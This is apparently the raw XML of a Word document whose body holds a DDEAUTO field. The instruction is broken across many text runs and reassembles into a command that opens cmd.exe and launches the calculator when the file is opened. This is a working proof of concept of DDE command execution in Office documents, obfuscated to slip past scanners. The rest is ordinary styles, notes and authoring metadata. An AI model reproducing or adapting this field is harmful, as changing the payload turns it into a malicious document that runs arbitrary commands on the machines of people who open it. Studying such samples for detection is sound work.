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05FD7" w:rsidRDefault="000700BC">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDEAUTO C:\</w:instrText>
      </w:r>
      <w:r w:rsidR="00961C8A">
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>windows</w:instrText>
      </w:r>
      <w:r w:rsidR="00961C8A">
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>\sys</w:instrText>
      </w:r>
      <w:r w:rsidR="00961C8A">
        <w:instrText>t</w:instrText>
      </w:r>
      <w:r>
        <w:instrText>em32</w:instrText>
      </w:r>
      <w:r w:rsidR="00961C8A">
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">\cmd.exe "/k calc" </w:instrText>
      </w:r>
      <w:r w:rsidR="00AC16C4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B0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F6" w:rsidRDefault="003E57F6" w:rsidP="005D50BF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003E57F6" w:rsidRDefault="003E57F6" w:rsidP="005D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F6" w:rsidRDefault="003E57F6" w:rsidP="005D50BF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003E57F6" w:rsidRDefault="003E57F6" w:rsidP="005D5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2"/>
    <w:rsid w:val="000700BC"/>
    <w:rsid w:val="003E57F6"/>
    <w:rsid w:val="005D50BF"/>
    <w:rsid w:val="00735E12"/>
    <w:rsid w:val="008704FA"/>
    <w:rsid w:val="00961C8A"/>
    <w:rsid w:val="00AC16C4"/>
    <w:rsid w:val="00B05FD7"/>
    <w:rsid w:val="00CE54B7"/>
    <w:rsid w:val="00D94911"/>
    <w:rsid w:val="00F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98C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8D533156-9FB1-4CBA-B29A-8774BAAD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D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50BF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AltBilgi">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="AltBilgiChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D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NouS/TncTR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ÖZER</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>FURKAN ÖZER</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-13T05:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-13T05:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>